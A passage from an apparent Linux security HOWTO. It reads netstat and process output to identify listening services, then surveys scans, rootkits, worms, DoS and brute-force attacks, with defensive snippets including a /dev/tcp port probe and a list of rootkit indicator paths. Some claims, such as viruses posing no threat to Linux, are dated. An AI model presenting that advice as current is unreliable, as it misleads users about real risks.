+-----------------------------------------------------------------------------+
| tcp 0 0 0.0.0.0:37 0.0.0.0:* LISTEN |
| tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN |
| tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN |
| |
| |
+-----------------------------------------------------------------------------+
Looking at /etc/services, we can tell that port 37 is the "time" service,
i.e. a time server. 6000 is X11, and 80 is the standard port for HTTP servers
like Apache. There is nothing really unusual here as these are all readily
available services on Linux.
The first two above are definitely not the kind of services you'd want just
anyone to connect to. These should be firewalled so that all outside
connections are refused. Again, we can't tell from this output whether any
firewall is in place, much less how effectively implemented it may be.
The web server on port 80 is not a huge security risk by itself. HTTP is a
protocol that is often open to all comers. For instance, if we wanted to host
our own home page, Apache can certainly do this for us. It is also possible
to firewall this off, so that it is for use only to our LAN clients as part
of an Intranet. Obviously too, if you do not have a good justification for
running a web server, then it should be disabled completely.
The next two lines are interesting:
+-----------------------------------------------------------------------------+
| tcp 0 0 192.168.1.1:53 0.0.0.0:* LISTEN |
| tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN |
| |
| |
+-----------------------------------------------------------------------------+
Again notice the "Local Address" is not 0.0.0.0. This is good! The port this
time is 53, or the DNS port used by nameserver daemons like named. But we see
the nameserver daemon is only listening on the lo interface (localhost), and
the interface that connects bigcat to the LAN. So the kernel only allows
connections from localhost, and the LAN. There will be no port 53 available
to outside connections at all. This is a good example of how individual
applications can sometimes be securely configured. In this case, we are
probably looking at a caching DNS server since a real nameserver that is
responsible for handling DNS queries would have to have port 53 open to the
world. This is a security risk and requires special handling.
The last three LISTENER entries:
+-----------------------------------------------------------------------------+
| tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN |
| tcp 0 0 0.0.0.0:631 0.0.0.0:* LISTEN |
| tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN |
| |
| |
+-----------------------------------------------------------------------------+
These are back to listening on all available interfaces. Port 22 is sshd, the
Secure Shell server daemon. This is a good sign! Notice that the service for
port 631 does not have a service name if we look at the output in the first
example. This might be a clue that something unusual is going on here. (See
the next section for the answer to this riddle.) And lastly, port 25, the
standard port for the SMTP mail daemon. Most Linux installations probably
will have an SMTP daemon running, so this is not necessarily unusual. But is
it necessary?
The next grouping is established connections. For our purposes the state of
the connection as indicated by the last column is not so important. This is
well explained in the man page.
+-------------------------------------------------------------------------------+
| tcp 0 1 169.254.179.139:1174 64.152.100.93:119 SYN_SENT |
| tcp 0 1 169.254.179.139:1175 64.152.100.93:119 SYN_SENT |
| tcp 0 1 169.254.179.139:1173 64.152.100.93:119 SYN_SENT |
| tcp 0 0 169.254.179.139:1172 207.153.203.114:80 ESTABLISHED |
| tcp 1 0 169.254.179.139:1199 216.26.129.136:80 CLOSE_WAIT |
| tcp 0 0 169.254.179.139:80 63.236.92.144:34197 TIME_WAIT |
| tcp 400 0 127.0.0.1:1152 127.0.0.1:8000 CLOSE_WAIT |
| tcp 6648 0 127.0.0.1:1162 127.0.0.1:8000 CLOSE_WAIT |
| tcp 553 0 127.0.0.1:1164 127.0.0.1:8000 CLOSE_WAIT |
| |
| |
+-------------------------------------------------------------------------------+
There are nine total connections here. The first three are our external
interface connecting to a remote host on their port 119, the standard NNTP
(News) port. There are three connections here to the same news server.
Apparently the application is multi-threaded, as it is trying to open
multiple connections to the news server. The next two entries are connections
to a remote web server as indicated by the port 80 after the colon in the
fifth column. Probably a pretty common looking entry for most of us. But the
one just after is reversed and has the port 80 in the fourth column, so this
is someone that has connected to bigcat's web server via its external,
Internet-side interface. The last three entries are all connections from
localhost to localhost. So we are connecting to ourselves here. Remembering
from above that port 8000 is bigcat's web proxy, this is a web browser that
is connected to the locally running proxy. The proxy then will open an
external connection of its own, which probably is what is going on with lines
four and five.
Since we gave netstat both the -t and -u options, we are getting both the TCP
and UDP listening servers. The last few lines are the UDP ones:
+----------------------------------------------------------------------------+
| udp 0 0 0.0.0.0:32768 0.0.0.0:* |
| udp 0 0 192.168.1.1:53 0.0.0.0:* |
| udp 0 0 127.0.0.1:53 0.0.0.0:* |
| udp 0 0 0.0.0.0:631 0.0.0.0:* |
| |
| |
+----------------------------------------------------------------------------+
The last three entries have ports that are familiar from the above
discussion. These are servers that are listening for both TCP and UDP
connections. Same servers in this case, just using two different protocols.
The first one on local port 32768 is new, and does not have a service name
available to it in /etc/services. So at first glance this should be
suspicious and pique our curiosity. See the next section for the explanation.
Can we draw any conclusions from this hypothetical situation? For the most
part, these look to be pretty normal looking network services and connections
for Linux. There does not seem to be an unduly high number of servers running
here, but that by itself does not mean much since we don't know if all these
servers are really required or not. We know that netstat cannot tell us if
any of these are effectively firewalled, so there is no way to say how secure
all this might be. We also don't really know if all the listening services
are really required by the owner here. That is something that varies widely
from installation to installation. Does bigcat even have a printer attached
for instance? Presumably it does, or this is a completely unnecessary risk.
-----------------------------------------------------------------------------
8.3.2. Port and Process Owners
We've learned a lot about what is going on with bigcat's networking from the
above section. But suppose we see something we don't recognize and want to
know what started that particular service? Or we want to stop a particular
server and it is not obvious from the above output?
The -p option should give us the process's PID and the program name that
started the process in the last column. Let's look at the TCP servers again
(with first three columns cropped for spacing). We'll have to run this as
root to get all the available information:
+----------------------------------------------------------------------------+
|# netstat -tap |
|Active Internet connections (servers and established) |
| Local Address Foreign Address State PID/Program name |
| *:printer *:* LISTEN 988/inetd |
| bigcat:8000 *:* LISTEN 1064/junkbuster |
| *:time *:* LISTEN 988/inetd |
| *:x11 *:* LISTEN 1462/X |
| *:http *:* LISTEN 1078/httpd |
| bigcat:domain *:* LISTEN 956/named |
| bigcat:domain *:* LISTEN 956/named |
| *:ssh *:* LISTEN 972/sshd |
| *:631 *:* LISTEN 1315/cupsd |
| *:smtp *:* LISTEN 1051/master |
| |
| |
+----------------------------------------------------------------------------+
Some of these we already know about. But we see now that the printer daemon
on port 515 is being started via inetd with a PID of "988". inetd is a
special situation. inetd is often called the "super server", since its main
role is to spawn sub-services. xinetd replaces inetd as of Red Hat 7.0. If we
look at the first line, inetd is listening on port 515 for printer services.
If a connection comes for this port, inetd intercepts it, and then will spawn
the appropriate daemon, i.e. the print daemon in this case. The configuration
of how inetd handles this is typically done in /etc/inetd.conf. This should
tell us that if we want to stop an inetd controlled server on a permanent
basis, then we will have to dig into the inetd (or perhaps xinetd)
configuration. The time service above is started via inetd as well. This
should also tell us that these two services can be further protected by
tcpwrappers (discussed in Step 3 above). This is one benefit of using inetd
to control certain system services.
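To see exactly how inetd is starting such a service, we can grep its
configuration. A sketch, assuming the traditional /etc/inetd.conf location
(xinetd keeps per-service files under /etc/xinetd.d/ instead); the helper
name svc_entry is ours:

```shell
# Show the inetd.conf line(s) for a given service. Commenting such a
# line out (and restarting inetd) disables the service permanently.
svc_entry() {
    # usage: svc_entry <service-name> [inetd.conf path]
    grep -n "^$1" "${2:-/etc/inetd.conf}" 2>/dev/null
}

svc_entry printer || echo "printer is not inetd-managed here"
```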
We weren't sure about the service on port 631 above since it did not have a
standard service name, which suggests it is something unusual or off the
beaten path. Now we see it is owned by cupsd (not included with Red Hat by
the way), which is one of several print daemons available under Linux. This
happens to be the web interface for controlling the printer service,
something cupsd does that is a little different from other print servers.
The last entry above is the SMTP mail server on bigcat. Often, this is
sendmail. But not in this case. The command is "master", which may not ring
any bells. Armed with the program name we could go searching the filesystem
with tools like the locate or find commands. After we found it, we could then
probably discern what package it belonged to. But with the PID available now,
we can look at ps output, and see if that helps us any:
+---------------------------------------------------------------------------+
| $ /bin/ps ax |grep 1051 |grep -v grep |
| 1051 ? S 0:24 /usr/libexec/postfix/master |
| |
| |
+---------------------------------------------------------------------------+
We took a shortcut here by combining ps with grep. It looks like this file
belongs to postfix, which is indeed a mail server package comparable to
sendmail (and is included with Powertools, not the base distribution).
Running ps with the --forest flag (f for short) can be helpful in
determining which processes are parent or child processes of another. An
edited example:
+---------------------------------------------------------------------------+
| $ /bin/ps -axf |
| 956 ? S 0:00 named -u named |
| 957 ? S 0:00 \_ named -u named |
| 958 ? S 0:46 \_ named -u named |
| 959 ? S 0:47 \_ named -u named |
| 960 ? S 0:00 \_ named -u named |
| 961 ? S 0:11 \_ named -u named |
| 1051 ? S 0:30 /usr/libexec/postfix/master |
| 1703 ? S 0:00 \_ tlsmgr -l -t fifo -u -c |
| 1704 ? S 0:00 \_ qmgr -l -t fifo -u -c |
| 1955 ? S 0:00 \_ pickup -l -t fifo -c |
| 1863 ? S 0:00 \_ trivial-rewrite -n rewrite -t unix -u -c |
| 2043 ? S 0:00 \_ cleanup -t unix -u -c |
| 2049 ? S 0:00 \_ local -t unix |
| 2062 ? S 0:00 \_ smtpd -n smtp -t inet -u -c |
| |
| |
+---------------------------------------------------------------------------+
A couple of things to note here. We have two by now familiar daemons: named
and postfix. Both are spawning sub-processes. In the case of named, what we
are seeing are threads, the various sub-processes that it always spawns.
Postfix is also spawning sub-processes, but not as "threads". Each
sub-process has its own specific task. It is worth noting that child
processes are dependent on the parent process, so killing the parent PID
will in turn kill all of its child processes.
If all this has not shed any light, we might also try locate:
+---------------------------------------------------------------------------+
| $ locate /master |
| /etc/postfix/master.cf |
| /var/spool/postfix/pid/master.pid |
| /usr/libexec/postfix/master |
| /usr/share/vim/syntax/master.vim |
| /usr/share/vim/vim60z/syntax/master.vim |
| /usr/share/doc/postfix-20010202/html/master.8.html |
| /usr/share/doc/postfix-20010202/master.cf |
| /usr/share/man/man8/master.8.gz |
| |
| |
+---------------------------------------------------------------------------+
find is perhaps the most flexible file finding utility, but doesn't use a
database the way locate does, so is much slower:
+---------------------------------------------------------------------------+
| $ find / -name master |
| /usr/libexec/postfix/master |
| |
| |
+---------------------------------------------------------------------------+
If lsof is installed, it is another command that is useful for finding who
owns processes or ports:
+---------------------------------------------------------------------------+
| # lsof -i :631 |
| COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME |
| cupsd 1315 root 0u IPv4 3734 TCP *:631 (LISTEN) |
| |
| |
+---------------------------------------------------------------------------+
This is again telling us that the cupsd print daemon is the owner of port
631. Just a different way of getting at it. Yet one more way to get at this
is with fuser, which should be installed:
+---------------------------------------------------------------------------+
| # fuser -v -n tcp 631 |
| |
| USER PID ACCESS COMMAND |
| 631/tcp root 1315 f.... cupsd |
| |
| |
+---------------------------------------------------------------------------+
See the man pages for fuser and lsof command syntax.
Another place to look for where a service is started, is in the init.d
directory, where the actual init scripts live. Something like ls -l /etc/rc.d
/init.d/, should give us a list of these. Often the script name itself gives
a hint as to which service(s) it starts, though it may not necessarily
exactly match the "Program Name" as provided by netstat. Or we can use grep
to search inside the files for a matching pattern. Suppose we need to find
where rpc.statd is being started, but don't see a script by that name:
+---------------------------------------------------------------------------+
| # grep rpc.statd /etc/init.d/* |
| /etc/init.d/nfslock: [ -x /sbin/rpc.statd ] || exit 0 |
| /etc/init.d/nfslock: daemon rpc.statd |
| /etc/init.d/nfslock: killproc rpc.statd |
| /etc/init.d/nfslock: status rpc.statd |
| /etc/init.d/nfslock: /sbin/pidof rpc.statd >/dev/null 2>&1; STATD="$?" |
| |
| |
+---------------------------------------------------------------------------+
We didn't really need all that information, but at least we see now exactly
which script is starting it. Remember too that not all services are started
this way. Some may be started via inetd, or xinetd.
The /proc filesystem also keeps everything we want to know about processes
that are running. We can query this to find out more information about each
process. Do you need to know the full path of the command that started a
process?
+-----------------------------------------------------------------------------+
| # ls -l /proc/1315/exe |
| lrwxrwxrwx 1 root root 0 July 4 19:41 /proc/1315/exe -> /usr/sbin/cupsd |
| |
| |
+-----------------------------------------------------------------------------+
Finally, we had a loose end or two in the UDP listening services. Remember we
had a strange looking port number 32768, that also had no service name
associated with it:
+------------------------------------------------------------------------------------+
| # netstat -aup |
| Active Internet connections (servers and established) |
| Local Address Foreign Address State PID/Program name |
| *:32768 *:* 956/named |
| bigcat:domain *:* 956/named |
| bigcat:domain *:* 956/named |
| *:631 *:* 1315/cupsd |
| |
| |
+------------------------------------------------------------------------------------+
Now by including the "PID/Program name" option with the -p flag, we see this
also belongs to named, the nameserver daemon. Recent versions of BIND use an
unprivileged port for some types of traffic. In this case, this is BIND 9.x.
So no real alarms here either. The unprivileged port here is the one named
uses to talk to other nameservers for name and address lookups, and should
not be firewalled.
So we found no big surprises in this hypothetical situation.
If all else fails, and you can't find a process owner for an open port,
suspect that it may be an RPC (Remote Procedure Call) service of some kind.
These use randomly assigned ports without any seeming logic or consistency,
and are typically controlled by the portmap daemon. In some cases, these may
not reveal the process owner to netstat or lsof. Try stopping portmap, and
then see if the mystery service goes away. Or you can use rpcinfo -p
localhost to see what RPC services may be running (portmap must be running
for this to work).
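The rpcinfo listing can be matched against a mystery port directly. A
sketch; the parsing helper is our own, and the live query is only attempted
when rpcinfo is installed (and only answers if the portmapper is up):

```shell
# Print the RPC service name registered on a given port, reading
# "rpcinfo -p" style output ("program vers proto port service") on stdin.
rpc_port_owner() {
    # usage: rpc_port_owner <port>
    awk -v p="$1" '$4 == p { print $5; exit }'
}

command -v rpcinfo >/dev/null 2>&1 \
    && rpcinfo -p localhost | rpc_port_owner 32768 || true
```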
Warning If you suspect you have been broken into, do not trust netstat or ps
output. There is a good chance that they, and other system
components, have been tampered with in such a way that the output is
not reliable.
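One defense is to record known-good checksums of the inspection tools while
the system is still trusted, and verify against them later. A minimal
sketch; the helper names are ours, and a real baseline belongs on read-only
media, since an intruder can doctor an on-disk baseline just as easily as
the binaries. On RPM-based systems, rpm -V net-tools procps performs a
similar check against the package database.

```shell
# Record md5 checksums of critical binaries, then verify them later.
record_baseline() {
    # usage: record_baseline <list-file> <binaries...>
    list="$1"; shift
    md5sum "$@" > "$list"
}

verify_baseline() {
    # usage: verify_baseline <list-file>
    md5sum -c "$1"    # prints OK/FAILED per file; nonzero exit on mismatch
}

# Typical use (paths illustrative):
#   record_baseline /mnt/floppy/tools.md5 /bin/ps /bin/netstat
#   verify_baseline /mnt/floppy/tools.md5
```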
-----------------------------------------------------------------------------
8.4. Attacks and Threats
In this section, we will take a quick look at some of the common threats and
techniques that are out there, and attempt to put them into some perspective.
The corporate world, government agencies and high profile Internet sites have
to be concerned with a much more diverse and challenging set of threats than
the typical home desktop user. There are many reasons someone may want to
break in to someone else's computer. It may be just for kicks, or any number
of malicious reasons. They may just want a base from which to attack someone
else. This is a very common motivation.
The most common "attack" for most of us is from already compromised systems.
The Internet is littered with computers that have been broken into, and are
now doing their master's bidding blindly, in zombie-like fashion. They are
programmed to scan massively large address ranges, probing each individual IP
address as they go. Looking for one or more open ports, and then probing for
known weaknesses if they get the chance. Very impersonal. Very methodical.
And very effective. We are all in the path of such robotic scans. All because
those responsible for these systems fail to do what you are doing now -
taking steps to protect their system(s), and avoid being r00ted.
These scans do not look at login banners that may be presented on connection.
It will do little good to change your /etc/issue.net to pretend that you are
running some obscure operating system. If they find something listening, they
will try all of the exploits appropriate to that port, without regard to any
indications your system may give. If it works, they are in -- if not, they
will move on.
-----------------------------------------------------------------------------
8.4.1. Port Scans and Probes
First, let's define "scan" and "probe" since these terms come up quite a bit.
A "probe" implies testing if a given port is open or closed, and possibly
what might be listening on that port. A "scan" implies "probing" either
multiple ports on one or more systems, or individual ports on multiple
systems. So you might "scan" all ports on your own system, for instance. Or a
cracker might "scan" the 216.78.*.* address range to see who has port 111
open.
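Scanning your own system is the legitimate side of this, and nmap (see the
Links section) is the standard tool for it. Even without nmap, a single
port can be probed from bash via its /dev/tcp redirection. A rough sketch;
/dev/tcp is a bash feature, so other shells will simply report the port as
closed:

```shell
# Probe one TCP port: "open" if something accepted the connection,
# "closed" if it was refused (or the shell lacks /dev/tcp support).
probe() {
    # usage: probe <host> <port>
    ( exec 3<>"/dev/tcp/$1/$2" ) 2>/dev/null && echo open || echo closed
}

probe 127.0.0.1 631   # is our own cupsd reachable?
```

For anything beyond one-off checks, nmap scans whole port ranges at once
and reports far more detail.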
Black hats can use scan and probe information to know what services are
running on a given system, and then they might know what exploits to try.
They may even be able to tell what Operating System is running, and even
kernel version, and thus get even more information. "Worms", on the other
hand, are automated and scan blindly, generally just looking for open ports,
and then a susceptible victim. They are not trying to "learn" anything, the
way a cracker might.
The distinction between "scan" and "probe" is often blurred. Both can be used
in good ways, or in bad ways, depending on who is doing it, and why. You might
ask a friend to scan you, for instance, to see how well your firewall is
working. This is a legitimate use of scanning tools such as nmap. But what if
someone you don't know does this? What is their intent? If it's your ISP,
they may be trying to enforce their Terms of Service Agreement. Or maybe, it
is someone just playing, and seeing who is "out there". But more than likely
it is someone or something with not such good intentions.
Full range port scans (meaning probing of many ports on the same machine)
seem to be a not so common threat for home based networks. But certainly,
scanning individual ports across numerous systems is a very, very common
occurrence.
-----------------------------------------------------------------------------
8.4.2. Rootkits
A "rootkit" is the script kiddie's stock in trade. When a successful
intrusion takes place, the first thing that is often done, is to download and
install such "rootkits". The rootkit is a set of scripts designed to take
control of the system, and then hide the intrusion. Rootkits are readily
available on the web for various Operating Systems.
A rootkit will typically replace critical system files such as ls, ps,
netstat, login and others. Passwords may be added, hidden daemons started,
logs tampered with, and surely one or more backdoors are opened. The hidden
backdoors allow easy access any time the attacker wants back in. And often
the vulnerability itself may even be fixed so that the new "owner" has the
system all to himself. The entire process is scripted so it happens very
quickly. The rightful owners of these compromised systems generally have no
idea what is going on, and are victims themselves. A well designed rootkit
can be very difficult to detect.
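Dedicated checkers such as chkrootkit (see the Links section) look for the
filesystem fingerprints of known rootkits. The idea can be sketched by
hand; the paths below are a tiny illustrative sample associated with
well-known kits like t0rn, not a complete or current list:

```shell
# Flag a few file paths that known Linux rootkits have used. A clean
# result here proves nothing by itself; use a maintained checker.
rk_path_check() {
    # usage: rk_path_check <path>...
    for f in "$@"; do
        [ -e "$f" ] && echo "WARNING: suspicious path: $f"
    done
    echo "rootkit path check done"
}

rk_path_check /usr/src/.puta /usr/info/.t0rn /dev/.lib
```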
-----------------------------------------------------------------------------
8.4.3. Worms and Zombies
A "worm" is a self replicating exploit. It infects a system, then attempts to
spread itself typically via the same vulnerability. Various "worms" are
weaving their way through the entire Internet address space constantly,
spreading themselves as they go.
But somewhere behind the zombie, there is a controller. Someone launched the
worm, and they will be informed after a successful intrusion. It is then up
to them how the system will be used.
Many of these are Linux systems, looking for other Linux systems to "infect"
via a number of exploits. But most Operating Systems share in this threat.
Once a vulnerable system is found, the actual entry and take over is quick,
and may be difficult to detect after the fact. The first thing an intruder
(whether human or "worm") will do is attempt to cover their tracks. A
"rootkit" is downloaded and installed. This trend has been exacerbated by the
growing popularity of cable modems and DSL. The number of full time Internet
connections is growing rapidly, and this makes fertile ground for such
exploits since often these aren't as well secured as larger sites.
While this may sound ominous, a few simple precautions can effectively deter
this type of attack. With so many easy victims out there, why waste much
effort breaking into your system? There is no incentive to really try very
hard. Just scan, look, try, move on if unsuccessful. There are always more
IPs to be scanned. If your firewall is effectively bouncing this kind of
thing, it is no threat to you at all. Take comfort in that, and don't
overreact.
It is worth noting, that these worms cannot "force" their way in. They need
an open and accessible port, and a known vulnerability. If you remember the
"Iptables Weekly Log Summary" in the opening section above, many of those may
have all been the result of this type of scan. If you've followed the steps
in this HOWTO, you should be reasonably safe here. This one is easy enough to
deflect.
-----------------------------------------------------------------------------
8.4.4. Script Kiddies
A "script kiddie" is a "cracker" wanna be who doesn't know enough to come up
with his/her own exploits, but instead relies on "scripts" and exploits that
have been developed by others. Like "worms", they are looking for easy
victims, and may similarly scan large address ranges looking for specific
ports with known vulnerabilities. Often, the actual scanning is done from
already compromised systems so that it is difficult to trace back to them.
The script kiddie has a bag of ready made tricks at his disposal, including
an arsenal of "rootkits" for various Operating Systems. Finding susceptible
victims is not so hard, given enough time and address space to probe. The
motives are a mixed bag as well. Simple mischief, defacement of web sites,
stolen credit card numbers, and the latest craze, "Denial of Service" attacks
(see below). They collect zombies like trophies and use them to carry out
whatever their objective is.
Again, the key here is that they are following a "script", and looking for
easy prey. Like the worm threat above, a functional firewall and a few very
basic precautions, should be sufficient to deflect any threat here. By now,
you should be relatively safe from this nuisance.
-----------------------------------------------------------------------------
8.4.5. Spoofed IPs
How easy is it to spoof an IP address? With the right tools, very easy. How
much of a threat is this? Not much for most of us; it is over-hyped as a
threat.
Because of the way TCP/IP works, each packet must carry both the source and
destination IP addresses. Any return traffic is based on this information. So
a spoofed IP can never return any useful information to an attacker who is
sending out spoofed packets. The traffic would go back to wherever that
spoofed IP address was pointed. The attacker gets nothing back at all.
This does have potential for "DoS" attacks (see below) where learning
something about the targeted system is not important. It may be used for
some general mischief making as well.
-----------------------------------------------------------------------------
8.4.6. Targeted Attacks
Worms and wide-ranging address scans are impersonal. They are just
looking for any vulnerable system. It makes no difference whether it is a top
secret government facility, or your mother's Windows box. But there are
"black hats" that will spend a great deal of effort to get into a system or
network. We'll call these "targeted" attacks since there has been a
deliberate decision made to break in to a specific system or network.
In this case, the attacker will look the system over for weaknesses. And
possibly make many different kinds of attempts, until he finds a crack to
wiggle through. Or gives up. This is more difficult to defend against. The
attacker is armed and dangerous, so to speak, and is stalking his prey.
Again, this scenario is very unlikely for a typical home system. There just
generally isn't any incentive to take the time and effort when there are
bigger fish to fry. For those who may be targets, the best defense here
includes many of the things we've discussed. Vigilance is probably more
important than ever. Good logging practices and an IDS (Intrusion Detection
System) should be in place, along with a subscription to one or more security
related mailing lists like BUGTRAQ. And of course, reading those alerts
daily, and taking the appropriate actions, etc.
-----------------------------------------------------------------------------
8.4.7. Denial of Service (DoS)
"DoS" is another type of "attack" in which the intention is to disrupt or
overwhelm the targeted system or network in such a way that it cannot
function normally. DoS can take many forms. On the Internet, this often means
overwhelming the victim's bandwidth or TCP/IP stack, by sending floods of
packets and thus effectively disabling the connection. We are talking about
many, many packets per second. Thousands in some cases. Or perhaps, the
objective is to crash a server.
This is much more likely to be targeted at organizations or high profile
sites, than home users. And can be quite challenging to stop depending on the
technique. And it generally requires the co-operation of networks between the
source(s) and the target, so that the floods are stopped, or minimized,
before they reach the targeted destination. Once they hit the destination,
there is no good way to completely ignore them.
"DDoS", Distributed Denial of Service, is where multiple sources are used to
maximize the impact. Again, not likely to be directly targeted at home users.
These are "slaves" that are "owned" by a cracker, or script kiddie, that are
woken up and are targeted at the victim. There may be many computers involved
in the attack.
If you are a home user with a dynamic IP address, you might find that
disconnecting, then re-connecting to get a new IP address, is an effective
way out if you are the target. Maybe.
-----------------------------------------------------------------------------
8.4.8. Brute Force
"Brute force" attacks are where the attacker makes repetitive attempts at the
same perceived weakness(es). Like a battering ram. A classic example would be
where someone tries to access a telnet server simply by continually throwing
passwords at it, hoping that one will eventually work. Or maybe crash the
server. This doesn't require much imagination, and is not a commonly used
tactic against home systems.
By the way, this is one good argument against allowing remote root logins.
The root account exists on all systems, and is probably the only account of
which that is true. You'd like to make a potential attacker guess both the login name
and password. But if root is allowed remote logins, then the attacker only
needs to guess the password!
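With OpenSSH, forbidding remote root logins is a one-line change in the
server configuration. A sketch; /etc/ssh/sshd_config is the usual location,
the helper name is ours, and sshd must be restarted after editing:

```shell
# Check whether sshd currently permits direct root logins. The safer
# setting is "PermitRootLogin no": an attacker then needs a valid user
# name as well as a password.
root_login_setting() {
    # usage: root_login_setting [sshd_config path]
    grep -i '^PermitRootLogin' "${1:-/etc/ssh/sshd_config}" 2>/dev/null \
        || echo "PermitRootLogin not set (sshd default applies)"
}

root_login_setting
```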
-----------------------------------------------------------------------------
8.4.9. Viruses
And now something not to worry about. Viruses seem to be primarily a
Microsoft problem. For various reasons, viruses are not a significant threat
to Linux users. This is not to say that it will always be this way, but the
current virus explosion that plagues Microsoft systems, can not spread to
Linux (or Unix) based systems. In fact, the various methods and practices
that enable this phenomenon are not exploitable on Linux. So anti-virus
software is not recommended as part of our arsenal. At least for the time
being with Linux only networks.
-----------------------------------------------------------------------------
8.5. Links
Some references for further reading are listed below. Not listed is your
distribution's site, security page or ftp download site. You will have to
find these on your own. Then you should bookmark them!
  * Redhat sites of interest:
The Redhat watch/security mailing list: [https://listman.redhat.com/
mailman/listinfo/redhat-watch-list] https://listman.redhat.com/mailman/
listinfo/redhat-watch-list
Red Hat errata and security notices: [http://redhat.com/errata/] http://
redhat.com/errata/
The Red Hat update FTP site: [ftp://updates.redhat.com/] ftp://
updates.redhat.com/
  * Other relevant documents available from the Linux Documentation Project:
Security HOWTO: [http://tldp.org/HOWTO/Security-HOWTO.html ] http://
tldp.org/HOWTO/Security-HOWTO.html
Firewall HOWTO: [http://tldp.org/HOWTO/Firewall-HOWTO.html] http://
tldp.org/HOWTO/Firewall-HOWTO.html
Ipchains HOWTO: [http://tldp.org/HOWTO/IPCHAINS-HOWTO.html ] http://
tldp.org/HOWTO/IPCHAINS-HOWTO.html
User Authentication: [http://tldp.org/HOWTO/User-Authentication-HOWTO/
index.html] http://tldp.org/HOWTO/User-Authentication-HOWTO/index.html,
includes a nice discussion on PAM.
VPN (Virtual Private Network): [http://tldp.org/HOWTO/VPN-HOWTO.html]
http://tldp.org/HOWTO/VPN-HOWTO.html and [http://tldp.org/HOWTO/
VPN-Masquerade-HOWTO.html] http://tldp.org/HOWTO/
VPN-Masquerade-HOWTO.html
The Remote X Apps Mini HOWTO, [http://www.tldp.org/HOWTO/mini/
Remote-X-Apps.html] http://www.tldp.org/HOWTO/mini/Remote-X-Apps.html,
includes excellent discussions on the security implications of running X
Windows.
The Linux Network Administrators Guide: [http://tldp.org/LDP/nag2/
index.html] http://tldp.org/LDP/nag2/index.html, includes a good overview
of networking and TCP/IP, and firewalling.
The Linux Administrator's Security Guide: [http://www.seifried.org/lasg/]
http://www.seifried.org/lasg/, includes many obvious topics of interest,
including firewalling, passwords and authentication, PAM, and more.
Securing Red Hat: [http://tldp.org/LDP/solrhe/
Securing-Optimizing-Linux-RH-Edition-v1.3/index.html] http://tldp.org/LDP
/solrhe/Securing-Optimizing-Linux-RH-Edition-v1.3/index.html
  * Tools for creating custom ipchains and iptables firewall scripts:
Firestarter: [http://firestarter.sourceforge.net] http://
firestarter.sourceforge.net
Two related projects: [http://seawall.sourceforge.net/] http://
seawall.sourceforge.net/ for ipchains, and [http://
shorewall.sourceforge.net/] http://shorewall.sourceforge.net/ for
iptables.
  * Netfilter and iptables documentation from the netfilter developers
(available in many other languages as well):
FAQ: [http://netfilter.samba.org/documentation/FAQ/netfilter-faq.html]
http://netfilter.samba.org/documentation/FAQ/netfilter-faq.html
Packet filtering: [http://netfilter.samba.org/documentation/HOWTO/
packet-filtering-HOWTO.html] http://netfilter.samba.org/documentation/
HOWTO/packet-filtering-HOWTO.html
Networking: [http://netfilter.samba.org/documentation/HOWTO/
networking-concepts-HOWTO.html] http://netfilter.samba.org/documentation/
HOWTO/networking-concepts-HOWTO.html
NAT/masquerading: [http://netfilter.samba.org/documentation/HOWTO/
NAT-HOWTO.html] http://netfilter.samba.org/documentation/HOWTO/
NAT-HOWTO.html
  * Port number assignments, and what that scanner may be scanning for:
[http://www.linuxsecurity.com/resource_files/firewalls/
firewall-seen.html] http://www.linuxsecurity.com/resource_files/firewalls
/firewall-seen.html
[http://www.sans.org/newlook/resources/IDFAQ/oddports.htm] http://
www.sans.org/newlook/resources/IDFAQ/oddports.htm
[http://www.iana.org/assignments/port-numbers] http://www.iana.org/
assignments/port-numbers, the official assignments.
  * General security sites. These all have areas on documentation, alerts,
newsletters, mailing lists, and other resources.
Linux Security.com: [http://www.linuxsecurity.com] http://
www.linuxsecurity.com, loaded with good info, and Linux specific. Lots of
good docs: [http://www.linuxsecurity.com/docs/] http://
www.linuxsecurity.com/docs/
CERT, [http://www.cert.org] http://www.cert.org
The SANS Institute: [http://www.sans.org/] http://www.sans.org/
The Coroner's Toolkit (TCT): [http://www.fish.com/security/] http://
www.fish.com/security/, discussions and tools for dealing with post
break-in issues (and preventing them in the first place).
  * Privacy:
Junkbuster: [http://www.junkbuster.com] http://www.junkbuster.com, a web
proxy and cookie manager.
PGP: [http://www.gnupg.org/] http://www.gnupg.org/
  * Other documentation and reference sites:
Linux Security.com: [http://www.linuxsecurity.com/docs/] http://
www.linuxsecurity.com/docs/
Linux Newbie: [http://www.linuxnewbie.org/nhf/intel/security/index.html]
http://www.linuxnewbie.org/nhf/intel/security/index.html
The comp.os.linux.security FAQ: [http://www.linuxsecurity.com/docs/
colsfaq.html] http://www.linuxsecurity.com/docs/colsfaq.html
The Internet Firewall FAQ: [http://www.interhack.net/pubs/fwfaq/] http://
www.interhack.net/pubs/fwfaq/
The Site Security Handbook RFC: [http://www.ietf.org/rfc/rfc2196.txt]
http://www.ietf.org/rfc/rfc2196.txt
  * Miscellaneous sites of interest:
[http://www.bastille-linux.org] http://www.bastille-linux.org, for
Mandrake and Red Hat only.
SAINT: [http://www.wwdsi.com/saint/] http://www.wwdsi.com/saint/, system
security analysis.
SSL: [http://www.openssl.org/] http://www.openssl.org/
SSH: [http://www.openssh.org/] http://www.openssh.org/
Scan yourself: [http://www.hackerwhacker.com] http://
www.hackerwhacker.com
PAM: [http://www.kernel.org/pub/linux/libs/pam/index.html] http://
www.kernel.org/pub/linux/libs/pam/index.html
Detecting Trojaned Linux Kernel Modules: [http://members.prestige.net/
tmiller12/papers/lkm.htm] http://members.prestige.net/tmiller12/papers/
lkm.htm
Rootkit checker: [http://www.chkrootkit.org] http://www.chkrootkit.org
Port scanning tool nmap's home page: [http://www.insecure.org] http://
www.insecure.org
Nessus, more than just a port scanner: [http://www.nessus.org] http://
www.nessus.org
Tripwire, intrusion detection: [http://www.tripwire.org] http://
www.tripwire.org
Snort, sniffer and more: [http://www.snort.org] http://www.snort.org
[http://www.mynetwatchman.com] http://www.mynetwatchman.com and [http://
dshield.org] http://dshield.org are "Distributed Intrusion Detection
Systems". They collect log data from subscribing "agents", and collate
the data to find and report malicious activity. If you want to fight
back, check these out.
-----------------------------------------------------------------------------
8.6. Editing Text Files
